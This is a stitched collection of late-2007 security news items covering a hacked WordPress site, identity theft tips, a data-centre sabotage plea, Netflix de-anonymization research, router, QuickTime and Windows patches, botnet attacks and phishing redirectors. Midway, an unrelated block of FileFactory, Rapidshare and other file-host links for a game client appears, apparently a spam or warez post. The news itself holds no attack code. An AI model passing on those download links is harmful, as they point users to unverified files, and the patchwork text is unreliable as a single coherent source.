This last point is interesting. It used to be considered obvious that web servers should not have permission to write files in places where they can also be served or executed by the web server. The problem is that the surge in user-generated content means there is pressure for easy authoring and customisation of web content. WordPress is an example, and some convenient though non-essential features depend on certain folders being writeable by the web server. That proved a fatal weakness, when combined with other vulnerabilities.

It is tempting to keep quiet about an embarrassing incident. However, I am convinced that it is better to discuss and learn from events like this. Further, I have never been under the illusion that web servers like mine are secure. They are not places for critical data. Flaws in popular applications are widely and frequently exploited, so my experience is not unusual. At the same time, just because something is commonplace does not make it unimportant. Hacked sites are the source of many perils, such as virus-infected spam messages, phishing sites, or any amount of illegal content.

Lessons learned? First, anyone managing their own web site, even on a shared host, needs to come to terms with the administrative responsibilities. Unfortunately, leaving well alone is a recipe for disaster. Fully managed solutions are increasingly attractive for non-specialists. Second, it is a reminder that insecure Windows boxes are by no means the main problem for Web security; Linux and PHP can be just as bad. It all depends on configuration, management, and applications. Third, the open-source community can be wonderfully responsive when people have problems.

Fourth, if you manage a web site, don’t forget to check the logs. If your site is hacked, at least you will be likely to discover it quickly.

Security experts have warned consumers to be aware of the growing threat of ID theft as the online holiday shopping season reaches full swing.

ID Secure, which uses public records, Social Security numbers and credit card monitoring technology to fight ID theft, said that personal identities could also be for sale to Christmas shoppers in the criminal world.

"Wherever there is information about a person, whether retained by a retailer, bank, credit bureau or database, there is someone out there who has the ability to steal it," said Dan Clements, a spokesman for ID Secure.

"The more difficult you make it for someone to rip you off, the less chance you have of becoming a victim of identity theft. These criminals are not looking for a challenge; they are looking for an opportunity."

Retail sales are expected to hit $474bn this year, according to the National Retail Federation, and online shopping soared 37 per cent on Cyber-Monday this year.

ID Secure has issued the following tips to help consumers shop safely this year:

* Limit the credit cards you carry, and leave other ID such as Social Security cards at home
* Keep all receipts and examine every charge on your statement before paying
* Make sure your security and antivirus software is updated regularly
* Give cash or gift cards as presents rather than writing cheques
* Use a cross-cut shredder
* Use passwords that are not easily cracked by hackers

Identity theft is the fastest growing crime in America, according to a study from Javelin Strategy & Research. The company recorded 27.3 million victims in the past five years, and nearly 20 million in the past two years.

"New technologies can keep consumers one step ahead of would be ID thieves. They are perhaps the best chance of avoiding identity-related criminal abuse," said Clements.

"Punishment for fraud and recovery of stolen funds is so rare that prevention is the only viable course of action."

A sys admin last week pleaded guilty to attempting to disrupt the power grid in California by shutting down a data centre that managed the state's electrical supply.

Lonnie Charles Denison, 33, of South Natomas in California confessed to breaking a glass cover and pushing an emergency power off button at the Independent System Operator's (ISO) data centre near Folsom on 15 April. The contract Unix sys admin was upset with his employer and co-workers at the time. Denison reportedly snapped shortly after discovering his computer privileges had been revoked.

Denison's actions prevented the ISO from communicating with the electricity market for about two hours, leaving California vulnerable to blackout conditions. In the event no blackout occurred because the incident happened late on a Sunday night, when demand was low, so California had no need to buy in excess generating capacity from other states.

Nonetheless, the incident cost the centre $14,000, UPI reports. It took 20 computer specialists about seven hours to restore the system.
Folsom data centre blues

Prosecutors allege Denision compounded his offences by sending a threatening email to an unnamed California ISO employee the next day implying he planted a bomb at the facility. The email said: "Hey, at one point I respected you... you have a new kid. So this is only because of him. Get out before the timer expires. Not long now. Take care."

ISO responded by evacuating 500 workers from the facility and transfered control of the grid to a second control centre.

Denison pleaded guilty to attempted damage of an energy facility, a felony offence punishable with up to five years' imprisonment and a $250,000 fine, at a hearing in Sacremento on Friday. He faces a sentencing hearing scheduled for 29 February. ®

The social network claims a bot from the Canadian porn site tried to gather its members' data.

Facebook is suing seventeen people and a Canadian Internet porn company for allegedly trying to mine the popular social networking site for its users' personal details.

Facebook alleges that in June servers controlled by the defendants used automated scripts to make more than 200,000 requests for personal information stored on Facebook's site. The allegations are contained in an amended lawsuit filed earlier this month in U.S. District Court in San Jose, California.

The company first filed suit back in June, but amended the complaint this month after obtaining court orders to identify who controlled the servers trying to access its site.

Experts have warned people against publishing too much personal information on social networking sites for fear it could be collected and then abused by fraudsters.

Facebook, one of the most-used social networking sites after MySpace, said the automated scripts caused error messages to be generated, but the company did not say if user information was successfully collected.

Named in the suit is Istra Holdings, which controls SlickCash.com, an affiliate advertising business that offers commissions to Web publishers for referring Internet surfers to its portfolio of adult sites.

It also names Brian Fabian and Josh Raskin, both of whom the suit says work at Istra in Toronto, and Ming Wu of Markham, Ontario, as well as 14 other unidentified people.

Facebook said the hacking attempts cost it at least US$5,000 to investigate. The company has requested a jury trial and is seeking to bar the defendants from accessing its computer systems in the future, in addition to damages.

Just click This Download Badge




FileFactory:

http://www.filefactory.com/file/ad7ab1/]http://www.filefactory.com/file/ad7ab1/
http://www.filefactory.com/file/26478a/]http://www.filefactory.com/file/26478a/
http://www.filefactory.com/file/8d62cb/]http://www.filefactory.com/file/8d62cb/
http://www.filefactory.com/file/ecd485/]http://www.filefactory.com/file/ecd485/
http://www.filefactory.com/file/8fdda1/]http://www.filefactory.com/file/8fdda1/
http://www.filefactory.com/file/ccf25d/]http://www.filefactory.com/file/ccf25d/
http://www.filefactory.com/file/55c61e/]http://www.filefactory.com/file/55c61e/
http://www.filefactory.com/file/4c3514/]http://www.filefactory.com/file/4c3514/
http://www.filefactory.com/file/497f3c/]http://www.filefactory.com/file/497f3c/
http://www.filefactory.com/file/087b82/]http://www.filefactory.com/file/087b82/
http://www.filefactory.com/file/b8efe8/]http://www.filefactory.com/file/b8efe8/


Rapidshare

http://rapidshare.com/files/75586310/SilkroadOnline_GlobalOfficial_v1_138.part01.rar]http://rapidshare.com/files/75586310/Silkr..._138.part01.rar
http://rapidshare.com/files/75588261/SilkroadOnline_GlobalOfficial_v1_138.part02.rar]http://rapidshare.com/files/75588261/Silkr..._138.part02.rar
http://rapidshare.com/files/75590363/SilkroadOnline_GlobalOfficial_v1_138.part03.rar]http://rapidshare.com/files/75590363/Silkr..._138.part03.rar
http://rapidshare.com/files/75592585/SilkroadOnline_GlobalOfficial_v1_138.part04.rar]http://rapidshare.com/files/75592585/Silkr..._138.part04.rar
http://rapidshare.com/files/75594840/SilkroadOnline_GlobalOfficial_v1_138.part05.rar]http://rapidshare.com/files/75594840/Silkr..._138.part05.rar
http://rapidshare.com/files/75597051/SilkroadOnline_GlobalOfficial_v1_138.part06.rar]http://rapidshare.com/files/75597051/Silkr..._138.part06.rar
http://rapidshare.com/files/75599124/SilkroadOnline_GlobalOfficial_v1_138.part07.rar]http://rapidshare.com/files/75599124/Silkr..._138.part07.rar
http://rapidshare.com/files/75600858/SilkroadOnline_GlobalOfficial_v1_138.part08.rar]http://rapidshare.com/files/75600858/Silkr..._138.part08.rar
http://rapidshare.com/files/75602498/SilkroadOnline_GlobalOfficial_v1_138.part09.rar]http://rapidshare.com/files/75602498/Silkr..._138.part09.rar
http://rapidshare.com/files/75604370/SilkroadOnline_GlobalOfficial_v1_138.part10.rar]http://rapidshare.com/files/75604370/Silkr..._138.part10.rar
http://rapidshare.com/files/75584778/SilkroadOnline_GlobalOfficial_v1_138.part11.rar]http://rapidshare.com/files/75584778/Silkr..._138.part11.rar


Mediafire

http://www.mediafire.com/?sharekey=96c2b5870c61725e91b20cc0d07ba4d2bb0b71ae91886b79]http://www.mediafire.com/?sharekey=96c2b58...b0b71ae91886b79


FileFront:

http://files.filefront.com/SilkroadOnline+GlobalOffi8exe/;9231709;/fileinfo.html]http://files.filefront.com/SilkroadOnline+...;/fileinfo.html

Last year, Netflix published 10 million movie rankings by 500,000 customers, as part of a challenge for people to come up with better recommendation systems than the one the company was using. The data was anonymized by removing personal details and replacing names with random numbers, to protect the privacy of the recommenders.

Arvind Narayanan and Vitaly Shmatikov, researchers at the University of Texas at Austin, de-anonymized some of the Netflix data by comparing rankings and timestamps with public information in the Internet Movie Database, or IMDb.

Their research (.pdf) illustrates some inherent security problems with anonymous data, but first it's important to explain what they did and did not do.

They did not reverse the anonymity of the entire Netflix dataset. What they did was reverse the anonymity of the Netflix dataset for those sampled users who also entered some movie rankings, under their own names, in the IMDb. (While IMDb's records are public, crawling the site to get them is against the IMDb's terms of service, so the researchers used a representative few to prove their algorithm.)

The point of the research was to demonstrate how little information is required to de-anonymize information in the Netflix dataset.

On one hand, isn't that sort of obvious? The risks of anonymous databases have been written about before, such as in this 2001 paper published in an IEEE journal (.pdf). The researchers working with the anonymous Netflix data didn't painstakingly figure out people's identities -- as others did with the AOL search database last year -- they just compared it with an already identified subset of similar data: a standard data-mining technique.

But as opportunities for this kind of analysis pop up more frequently, lots of anonymous data could end up at risk.

Someone with access to an anonymous dataset of telephone records, for example, might partially de-anonymize it by correlating it with a catalog merchants' telephone order database. Or Amazon's online book reviews could be the key to partially de-anonymizing a public database of credit card purchases, or a larger database of anonymous book reviews.

Google, with its database of users' internet searches, could easily de-anonymize a public database of internet purchases, or zero in on searches of medical terms to de-anonymize a public health database. Merchants who maintain detailed customer and purchase information could use their data to partially de-anonymize any large search engine's data, if it were released in an anonymized form. A data broker holding databases of several companies might be able to de-anonymize most of the records in those databases.

What the University of Texas researchers demonstrate is that this process isn't hard, and doesn't require a lot of data. It turns out that if you eliminate the top 100 movies everyone watches, our movie-watching habits are all pretty individual. This would certainly hold true for our book reading habits, our internet shopping habits, our telephone habits and our web searching habits.

The obvious countermeasures for this are, sadly, inadequate. Netflix could have randomized its dataset by removing a subset of the data, changing the timestamps or adding deliberate errors into the unique ID numbers it used to replace the names. It turns out, though, that this only makes the problem slightly harder. Narayanan's and Shmatikov's de-anonymization algorithm is surprisingly robust, and works with partial data, data that has been perturbed, even data with errors in it.

With only eight movie ratings (of which two may be completely wrong), and dates that may be up to two weeks in error, they can uniquely identify 99 percent of the records in the dataset. After that, all they need is a little bit of identifiable data: from the IMDb, from your blog, from anywhere. The moral is that it takes only a small named database for someone to pry the anonymity off a much larger anonymous database.

Other research reaches the same conclusion. Using public anonymous data from the 1990 census, Latanya Sweeney found that 87 percent of the population in the United States, 216 million of 248 million, could likely be uniquely identified by their five-digit ZIP code, combined with their gender and date of birth. About half of the U.S. population is likely identifiable by gender, date of birth and the city, town or municipality in which the person resides. Expanding the geographic scope to an entire county reduces that to a still-significant 18 percent. "In general," the researchers wrote, "few characteristics are needed to uniquely identify a person."

Stanford University researchers (.pdf) reported similar results using 2000 census data. It turns out that date of birth, which (unlike birthday month and day alone) sorts people into thousands of different buckets, is incredibly valuable in disambiguating people.

This has profound implications for releasing anonymous data. On one hand, anonymous data is an enormous boon for researchers -- AOL did a good thing when it released its anonymous dataset for research purposes, and it's sad that the CTO resigned and an entire research team was fired after the public outcry. Large anonymous databases of medical data are enormously valuable to society: for large-scale pharmacology studies, long-term follow-up studies and so on. Even anonymous telephone data makes for fascinating research.

On the other hand, in the age of wholesale surveillance, where everyone collects data on us all the time, anonymization is very fragile and riskier than it initially seems.

Like everything else in security, anonymity systems shouldn't be fielded before being subjected to adversarial attacks. We all know that it's folly to implement a cryptographic system before it's rigorously attacked; why should we expect anonymity systems to be any different? And, like everything else in security, anonymity is a trade-off. There are benefits, and there are corresponding risks.

Narayanan and Shmatikov are currently working on developing algorithms and techniques that enable the secure release of anonymous datasets like Netflix's. That's a research result we can all benefit from.

Juniper has published a security update designed to fix a bug involving its router software.

The glitch in JUNOS creates problems for networking kit from Juniper in processing Border Gateway Protocol (BGP) traffic. BGP is a core routing protocol of the internet that's widely used by ISPs and others to (put simply) map the best available routes for traffic to flow across the internet.

Left unfixed the flaw means that malformed BGP packets may induce "interface flapping".

Interface flapping means the interface of a network device is left going up and down repeatedly - like a tart's knickers, though on a much accelerated scale. The behaviour, on a large computer network, might be used to exhaust the memory buffers on devices targeted with malformed IPv6 messages. This, in turn, might lead to lost datagrams and general network chaos.

JUNOS releases from 7.3 to 8.4 are potentially vulnerable. Users are urged to upgrade their software to 8.5R1. The bug lends itself to remote exploitation, making it possible that it might form the basis of denial of service attack by hackers against service providers running Juniper kit.

Juniper is a strong number two behind Cisco in the supply of routing kit to large ISPs and telcos. One or two telco techies are already reporting minor glitches that they blame on the problem. A discussion on the issue can be found here. ®

MOBILE, Alabama (AP) -- Between ads for hamburgers and liposuction, the giant digital billboards flashed an image of Oscar Finch's face taken by a surveillance camera. The young man wasn't selling anything. He was running from police.

Finch was a suspect in a bank robbery last month. More than a week after the crime, authorities obtained the photo and immediately posted it on 12 digital billboards in Mobile, using the eye-catching electronic signs as digital wanted posters.

The billboard showed a grainy mugshot of Finch taken during the November 20 heist. The image, which was mixed in with commercial ads, included his name, his alleged offense and a phone number to contact police.

The 21-year-old Finch, who was the first suspect featured on an electronic billboard in Mobile, surrendered on December 1 -- just a day after his picture appeared. Police spokeswoman Nancy Johnson said he apparently turned himself in after seeing news coverage of the billboards.

"We had been looking for this individual for 10 days and turned it around in 24 hours," Johnson said. "So we're thinking it's going to be highly effective. I think it's a great asset for us."

Wanted posters have been used to find suspects for generations. Sketches of criminals in the Wild West were tacked onto trees and buildings. In more recent years, photos of the FBI's most wanted fugitives have been displayed in post offices.

With digital billboards, police can now display a suspect's face to thousands of people, sometimes almost immediately after a crime is reported.

"We can be up in 15 minutes" of getting a suspect's photo, said Troy Tatum, general manager of Lamar Advertising, the Baton Rouge, Louisiana-based company that provided free use of the billboards in Mobile as a public service.

When the electronic boards aren't showing suspects, they display regular advertising in moving, full-color images that stand 14 feet tall and 48 feet wide. They can also be used for AMBER Alerts for missing children and to deliver weather bulletins.

"We have a special slot set up for local emergencies," Tatum said.

Mobile Police Chief Phillip M. Garrett doesn't want to give such prominent display to "every lawnmower thief" wanted by police. He said the billboards will be used only in high-profile cases or in searches for missing people.

Only a fraction of U.S. billboards are digital -- 500-plus out of an estimated 450,000 total signs, according to the industry. But production of electronic boards is expected to grow.

Police in other parts of the country are also beginning to use the billboards.

In September, Florida authorities arrested a drug suspect two weeks after his photo was displayed on a billboard in Daytona Beach. A tipster who saw the suspect's picture found him sitting in a McDonald's.

The billboards have also been useful in disasters. When an interstate bridge collapsed in August in Minneapolis, billboards displayed an emergency message within 15 minutes.

The signs also have critics. Mobile City Council member Connie Hudson has proposed a temporary moratorium on any new billboards, saying the city needs safety regulations to control the number and spacing of the signs because they may distract drivers.

The full council has not acted on Hudson's concerns.

Ken Klein, vice president of the Outdoor Advertising Association of America Inc., in Washington, D.C., said billboard wanted posters became more common after a young woman was slain in 2002 in Leawood, Kansas.

The victim's father, Roger Kemp, approached Lamar Advertising for help, and the company posted a composite sketch of the suspect on a conventional billboard. A tipster who saw the sketch led authorities to Benjamin Appleby, 31.

Appleby was convicted in 2006 and sentenced to life in prison for killing 19-year-old Ali Kemp.

Apple has patched a flaw in its Quicktime multimedia player which is currently being exploited by attackers.

The vulnerability exists in the way Quicktime handles RTSP streaming media files. When a specially crafted file is launched, a buffer overflow error occurs. This error allows an attacker to remotely execute code on the targeted users machine.

The vulnerability was discovered by Polish security researcher Krystian Kloskowski in late November. Less than two weeks later, reports surfaced that attackers were actively targeting the vulnerability via adult websites.

The flaw was considered a greater risk for Firefox users because of the way the browser interacted with the Quicktime player. Researchers found that both Internet Explorer and Safari were able to prevent the attack form successfully executing.

The update addresses the issue in both the Quicktime player software for both Windows and MacOS systems. Users can download the update from Apple's website or via the company's Software Update utility.

Security researcher Jose Nazario has uncovered circumstantial evidence of the use of botnets in politically-motivated denial of service attacks.

Political events in the wider world are sometimes accompanied by hacking incidents in cyberspace, such as defacements and the like. Nobody paid much attention to the issue until the Estonian DDoS events of earlier this year when government and commercial sites in the small Baltic country were taken offline for days in April amid a row with Russia about relocation of a Soviet-era memorial to fallen soldiers and war graves.

Botnets orchestrated by Russian hackers are reckoned to have been used to fire up the Estonian attacks. Involvement of elements from the Russian government is suspected by some, though there's nothing by way of evidence that the Kremlin had a hand in the assaults.

Nazario, a senior security researcher at Arbor Networks, has documented how botnets have featured in more recent politically motivated DDoS events. Attacks on the Ukrainian pro-Russian site of the Party of Regions, a party led by the Ukrainian Prime Minister Viktor Yanukovych, over the last three months were traced by Nazario back to networks of compromised machines.

Earlier DDoS attacks against the site of Ukraine President Viktor Yushchenko, a moderate Ukrainian nationalist, were not traced back to botnet activity.

Last week, Nazario traced attacks on the site of Gary Kasparov, famed Russian chess grand master turned anti-establishment politician, and namarsh.ru, another dissident site, back to a botnet. Both targeted sites seem to have weathered the assault largely unscathed (though the graphics on Kasparov's site failed to load properly).

The motives, much less the perpetrators, of the attacks remain unclear. "I can dream up scenarios where Russian hackers attack Russian dissident websites and politicians’ websites (and why, for example, a Ukrainian site that is pro-Russian is attacked), but I don’t know who is at the keyboard," Nazario writes. "I’ll keep watching these attacks and seeing what I can figure out, but so far it’s just a matter of guessing at motivations." ®

Nearly 85 percent of privacy and security professionals believe a reportable breach of personally identifiable information (PII) occurred within their organization in the last year, according to an online survey of 800 such professionals published on Tuesday by accounting firm Deloitte & Touche and the Ponemon Institute.

Almost two-thirds of the professionals polled stated that their organizations had experienced multiple reportable breaches in the past year. The security and privacy managers only dedicated approximately 7 percent of their time to training employees and, at most, 10 percent of their time to establishing an incident response team, the survey found.

“Frankly, I’m shocked by the high percentage of PII data breaches we’re seeing occur within organizations," Rena Mears, Deloitte global and U.S. privacy and data protection leader, stated in the release announcing the study. "This survey provides insight into the scale of the problem and how enterprises are struggling to respond. It’s clear that both privacy and security professionals are caught in a reactive cycle, and they agree on the need to move to a more proactive stance.”

A number of events in 2007 have raised corporate awareness of privacy issues. In January, retail giant TJX Companies announced that successive online attacks during 2005 and 2006 has resulted in the loss of, at last count, more than 94 million credit- and debit-card accounts. Last month, the head of HM Revenue & Customs, the United Kingdom's tax agency, resigned following a massive data leak that potentially put the sensitive personal details of 25 million people at risk.

The attention has caused many companies move toward encrypting their data. The survey found that 55 percent of companies are implementing "some type of encryption" and 37 percent are currently encrypting data in transit and information stored on servers, according to the survey.

The Dutch Data Protection Authority is investigating claims that a medical database set up by health insurance companies reveals details about nearly every Dutch citizen.

Birth dates, social security numbers, health insurance information, and addresses of Dutch celebrities, MPs, and even well-known criminals can be easily traced by doctors, dentists, or suppliers of health care aids who use the database, Dutch newspaper Trouw revealed this week.

The Vecozo medical database is used by health care workers to make payments easier and to check Dutch medical insurance data. At least 80,000 people are able to search the database.

Vecozo, which is secured with a password and a certificate, stresses that no phone numbers can be found in the database. Celebs are able to change their personal information, so they cannot be traced under their own name.

Anyone that abuses the database will be punished, Vecozo warned yesterday, but computer security expert Bart Jacobs of Radboud University Nijmegen and TU Eindhoven told Trouw there is simply too much information in the database. "You don't need all that data in order to verify certain procedures," he said. ®

Spam email accounted for between 90 and 95 per cent of all email in 2007, up from an estimated five per cent of email in 2001, according to a report from web security company Barracuda Networks.

The report, which analysed more than one billion daily email messages sent to more than 50,000 users worldwide, also tracked the increasing complexity of spam techniques over the past several years. 2007 witnessed the majority of spammers using identity obfuscation techniques, in which spammers send email from diverse sources throughout the internet.

Other spamming trends also include the increased the use of attachments, including as PDF files and other file formats.

Prominent spam techniques from previous years include:

2006 - Image spam and botnets
2005 - Rotating URL spam
2004 - Automated generation of spam variants
2003 - Open relays, blast emails, spoofing

“The spam war is a continuous battle between spammers and security vendors,” said Dean Drako, president and CEO of Barracuda Networks. “Security vendors now require 24-by-7 defence operations to continuously monitor the internet for new spam trends and distribute new defensive solutions immediately.”

A separate poll of business professionals by the same company found that more than half (57 per cent) of the 261 respondents, now consider spam to be the worst form of junk advertising, nearly double the 31 per cent that cited postal junk mail and well ahead of the 12 per cent who chose telemarketing as their chief bug bear.

Security company Arbor Networks declared the iPhone to be a big target of mainland cybercriminals next year

IT security company Arbor Networks released a statement Tuesday declaring the iPhone to be a big target amongst cybercriminals next year.

Its Security and Engineering Response Team (ASERT) said the iPhone will fall "victim of a serious attack" in 2008, noting that the mobile device will likely be hit by "drive-by attacks". Arbor described these attacks as malware embedded in commonly used information such as images, which are capable of conducting "dangerous actions" when rendered in the iPhone's Web browser.

Because of the attention the iPhone generated over the past year, ASERT said hackers will be lured by the idea of being the first to penetrate the new platform and attack Apple users.

Arbor is not the first to issue security warnings about the iPhone. A team of U.S. security researchers in July said they had written two exploits capable of causing "serious problems" with the design and security implementation on the phone.

Research house Gartner also issued a cautionary note in June calling for enterprises to outlaw the Apple device from their office environment, due to lacking support from major mobile security tools and mobile e-mail vendors, among other issues.

A Gartner analyst, however, later predicted Apple may introduce an enterprise-class version of the iPhone that will better meet the requirements of a corporate environment.

Officially launched in the United States and Europe earlier this year, the iPhone is expected to make its debut in Asia next year, though Apple has yet to firm up an official launch date. The U.S. company is reportedly in talks with various operators across the Asian region.
Chinese spells trouble, too

According to ASERT, 2008 will also see an increase in "Chinese on Chinese" online attacks, involving specifically Chinese-language software such as QQ Messenger. Arbor noted that such attacks are expected to grow next year as new Chinese users join the online community, more software is written for the Chinese market, and Chinese cybercriminals become increasingly sophisticated and organized.

The IT security vendor also expects much larger Storm botnets and peer-to-peer attacks to be prevalent next year.

"2007 was the year of the browser exploit, the data breach, spyware and the storm worm. We expect 2008 to be the year of the iPhone attack, the Chinese hacker, P2P network spammers and the hijacking of the Storm botnet," Jose Nazario, senior security engineer at Arbor Networks, said in the statement.

"Online fraud is soaring and security attacks are now being used in countless and ever more sophisticated ways to both steal and launder money. Financial and other confidential data is being obtained, sold and utilized in the highly-developed black market," Nazrios said.

"In 2008, this market will continue to grow and it is important that businesses implement the processes and technology necessary to protect themselves and their customers."

More than half (57 per cent) of office employees admit to having lost an office laptop, BlackBerry or USB stick at some point in their careers, according to a recent survey.

Pubs, bars or restaurants are cited as the most common locations, the study by online backup firm Databarracks reported.

More than three quarters (77 per cent) of the 100 office workers canvassed in the survey also confessed to storing personal content such as photos on their office network or computers, despite the risk of malware infection.

According the survey, personal data is often prioritised over company data in the workplace. In the event of an office fire, 77 per cent of respondents indicated they would reach for their personal mobile phones ahead of their work PC.

"This research paints a frightening picture for UK organisations. Almost every business, irrelevant of sector, is reliant on the information stored on its IT network to manage day-to-day operations," said Databarracks managing director Peter Groucutt.

“While employees can be educated to treat corporate data more carefully, human error will always be a factor, so this is not a problem that is going to disappear overnight. More organisations have to start seriously considering secure online backup to protect themselves from unforeseen events.”

A small team of security researchers has documented how many high-profile websites are unwittingly helping phishing fraudsters.

Phishing scams often use "open redirector" exploits on major sites to make their attack URL look more legitimate. The trick also makes it more likely that fraudulent emails that form the basis of phishing attacks will slip past spam filters. Typically, security flaws on exploited high-profile sites allow a phisher to provide a link which appears to be a legitimate URL, but actually redirects to a fraudulent site.

Previous Register stories have covered examples of the ruse practiced on websites including Barclays Bank (story here), eBay (here), and others.

To date, most of the information about the topic has been anecdotal. SiteTruth aims to shed light on the scope of the problem by collecting hard numbers as part a project that ultimately aims to provide a search engine that will allow clued-up surfers to check on the legitimacy of sites. SiteTruth's search service isn't limited to sites that have paid a fee. Nor is it selling "seals of approval".

Its findings are partly based on existing business records, as well as links with other anti-phishing organisations (such as PhishTank, a clearing house for reports about phishing sites), and its own research. It also takes submissions from webmasters, as explained here.

Even so, the site admits its findings aren't infallible and ought to serve only as a guideline. The safe search feature is currently in Alpha testing.

SiteTruth's research, based on the collection of information about exploited websites and updated every three hours, also reports on insecure practices that serve the interest of cybercrooks. SiteTruth breaks down the vulnerabilities it finds into five categories, as follows:

* Open redirectors
* Sites that allow user hosted content in ways exploitable for phishing (i.e. "photobucket.com", which will accept uploads of Flash files)
* ISPs that provide DSL or cable connections for phishing sites
* Unscrupulous commercial hosting services
* Compromised sites exploited by phishers (Universities with high bandwidth connections and lax security are a favourite in this category)

Some of the items on the list cover broadly similar ground to that documented by Spamhaus and others. However, the open redirector run-down compiled by SiteTruth is a distinct list that makes for interesting reading.

SiteTruth has cross referenced the 10,000 sites listed in PhishTank with the 1.7 million sites in the Open Directory Project database to discover a list of 171 problem domains. Domains listed typically have a security vulnerability which is being exploited by phishing fraudsters.

URL redirection isn't the only category for listing in this blacklist (hosting or otherwise unwittingly helping phishing scams also counts). But the sites allowing URL redirection include many high-profile organisations that ought to know better, including Google Maps. It's easy to bounce off Google Maps to reach the register, for example.

AOL, Microsoft Live, the BBC, Yahoo!, and UK bank Alliance and Leicester have also been greylisted by SiteTruth over the last three weeks.

"Phishing sites come and go rapidly; this list may be out of date within hours," SiteTruth's John Nagle told El Reg. "Some sites are still in PhishTank because they had an active phish in the recent past and PhishTank hasn't purged the entries yet. But some major sites have been on the list for weeks to months.

"So some major websites are being used to lend credibility to phishing attacks. But the number of major sites involved isn't large. It's no longer an acceptable excuse to claim that 'everybody has that problem'. Only some have it, and they need to fix it."

Critical bug-fixes ship for Internet Explorer, DirectX, and Windows Media Format technology.

Microsoft has released its monthly set of security patches, fixing critical flaws in the Windows desktop.

The December updates released Tuesday include critical fixes for Internet Explorer, DirectX and the Windows Media Format technology. Security experts say that the most important of these updates is the Internet Explorer patch, because it fixes four separate bugs in the browser. One of these flaws, relating to the way the browser renders dynamic HTML (DHTML) pages, has been exploited in online attacks, Microsoft said.

All of the browser vulnerabilities in this update are rated critical -- Microsoft's most serious rating -- for IE 7 users running on the latest version of Windows XP, Microsoft said.

Though Microsoft has assigned it the less-grave rating of "important," a patch for Macrovision copy-protection software that ships with Windows should also be given priority, security experts say. That's because criminals have already leveraged this bug in online attacks.

The Macrovision issue first cropped up in mid-October, when Symantecspotted attackers exploiting the flaw, but Microsoft was not able to ship a fix for the problem in last month's security updates, released Nov. 13. The flaw could be used by attackers to allow their software to run at a higher level of privilege within the operating system.

The flaw lies in the secdrv.sys driver that is used by Macrovision's SafeDisc system, which ships with Windows XP and Windows Server 2003.

Microsoft also issued important updates for the Windows Vista Server Message Block (SMB) version 2 filesharing protocol, the Vista kernel, and the Message Queuing Service in XP and Windows 2000.

Microsoft did not fix a recently publicized flaw in the way its Windows operating system looks up other computers on the Internet. This bug, which was publicized at a hacker conference in New Zealand, has to do with the way Windows systems look for DNS (Directory Name Service) information under certain configurations.

Interestingly, the Vista SMB flaw lies in a feature that allows senders to digitally sign SMB data in order to confirm that it is legitimate. Because the signing feature is not properly implemented, however, "an attacker could modify SMBv2 packets and impersonate a trusted source to perform malicious operations," Microsoft said.

"It's a security vulnerability in a security feature," said Eric Schultze, chief technology officer of Shavlik Technologies, via instant message. "SMB version 2 was built for Vista and Windows Server 2008, so it should have been vetted in the code design process. But it obviously slipped through."

In all, seven sets of patches were released Tuesday, fixing 11 vulnerabilities.

Though Microsoft has made much of its efforts to develop more secure software, the company ended 2007 with about the same number of security updates that it had in the year before, according to security vendor Kaspersky Lab. "The situation in 2007 hasn't changed noticeably from 2006," wrote David Emm, a senior technology consultant with Kaspersky, in a blog post. "Last year there were 49 critical, 23 important, and 5 moderate updates. 2007 brought very slightly fewer patches, with 43 critical, 24 important, and 2 moderate fixes."

San Francisco, CA (AHN) - A U.S. government computer security watchdog warned companies using Microsoft Office Access, hackers may be targeting the application. The U.S. Computer Emergency Readiness Team (US-CERT) said earlier this week it is "active exploitation" of Access database files.

Although the agency provided no details on the attacks observed, hackers could use the Access Database files to inject computer commands. Both Microsoft Internet Explorer and Outlook Express normally block the .mdb files, security vendor Symantec told InfoWorld.

As in previous warnings, Microsoft told users not to accept files from unknown sources.